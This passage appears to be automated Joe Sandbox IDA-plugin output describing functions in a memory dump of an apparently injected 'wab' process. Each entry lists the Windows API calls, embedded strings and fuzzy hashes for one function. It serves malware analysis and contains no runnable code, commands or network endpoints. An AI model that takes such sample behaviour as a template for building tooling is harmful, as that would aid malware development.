                                                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                  • memset.MSVCRT ref: 00408362
                                                                                  • memset.MSVCRT ref: 00408377
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 290601579-0
                                                                                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memchrmemset
                                                                                  • String ID: PD$PD
                                                                                  • API String ID: 1581201632-2312785699
                                                                                  • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                  • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                  • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                  • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                  • GetDC.USER32(00000000), ref: 00409F6E
                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                  • GetParent.USER32(?), ref: 00409FA5
                                                                                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                  • String ID:
                                                                                  • API String ID: 2163313125-0
                                                                                  • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                  • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                  • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                  • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@$wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 239872665-3916222277
                                                                                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                  • String ID: %s (%s)$YV@
                                                                                  • API String ID: 3979103747-598926743
                                                                                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                  • API String ID: 2767993716-572158859
                                                                                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • wcscpy.MSVCRT ref: 0040DAFB
                                                                                  • wcscpy.MSVCRT ref: 0040DB0B
                                                                                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                  • API String ID: 3176057301-2039793938
                                                                                  • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                  • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                  • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                  • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • database %s is already in use, xrefs: 0042F6C5
                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                  • out of memory, xrefs: 0042F865
                                                                                  • database is already attached, xrefs: 0042F721
                                                                                  • unable to open database: %s, xrefs: 0042F84E
                                                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset
                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                  • API String ID: 1297977491-2001300268
                                                                                  • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                  • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                  • memcpy.MSVCRT ref: 0040EB80
                                                                                  • memcpy.MSVCRT ref: 0040EB94
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                  • String ID: ($d
                                                                                  • API String ID: 1140211610-1915259565
                                                                                  • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                  • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                  • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                  • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 3015003838-0
                                                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00407E44
                                                                                  • memset.MSVCRT ref: 00407E5B
                                                                                  • _mbscpy.MSVCRT ref: 00407E7E
                                                                                  • _mbscpy.MSVCRT ref: 00407ED7
                                                                                  • _mbscpy.MSVCRT ref: 00407EEE
                                                                                  • _mbscpy.MSVCRT ref: 00407F01
                                                                                  • wcscpy.MSVCRT ref: 00407F10
                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 59245283-0
                                                                                  • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                  • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                  • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                  • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                  • String ID:
                                                                                  • API String ID: 3467550082-0
                                                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                  • API String ID: 3510742995-3273207271
                                                                                  • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                  • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                  • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                  • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                  • memset.MSVCRT ref: 00413ADC
                                                                                  • memset.MSVCRT ref: 00413AEC
                                                                                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                  • memset.MSVCRT ref: 00413BD7
                                                                                  • wcscpy.MSVCRT ref: 00413BF8
                                                                                  • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                  • String ID: 3A
                                                                                  • API String ID: 3300951397-293699754
                                                                                  • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                  • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                  • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                  • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                  • memcpy.MSVCRT ref: 0040D24C
                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                  • String ID: strings
                                                                                  • API String ID: 3166385802-3030018805
                                                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00411AF6
                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                  • wcsrchr.MSVCRT ref: 00411B14
                                                                                  • wcscat.MSVCRT ref: 00411B2E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                  • String ID: AE$.cfg$General$EA
                                                                                  • API String ID: 776488737-1622828088
                                                                                  • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                  • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                  • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                  • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040D8BD
                                                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                  • memset.MSVCRT ref: 0040D906
                                                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                  • String ID: sysdatetimepick32
                                                                                  • API String ID: 1028950076-4169760276
                                                                                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memset
                                                                                  • String ID: -journal$-wal
                                                                                  • API String ID: 438689982-2894717839
                                                                                  • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                  • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                  • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                  • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$Dialog$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3975816621-0
                                                                                  • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                  • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                  • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                  • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • _wcsicmp.MSVCRT ref: 00444D09
                                                                                  • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                  • _wcsicmp.MSVCRT ref: 00444D33
                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
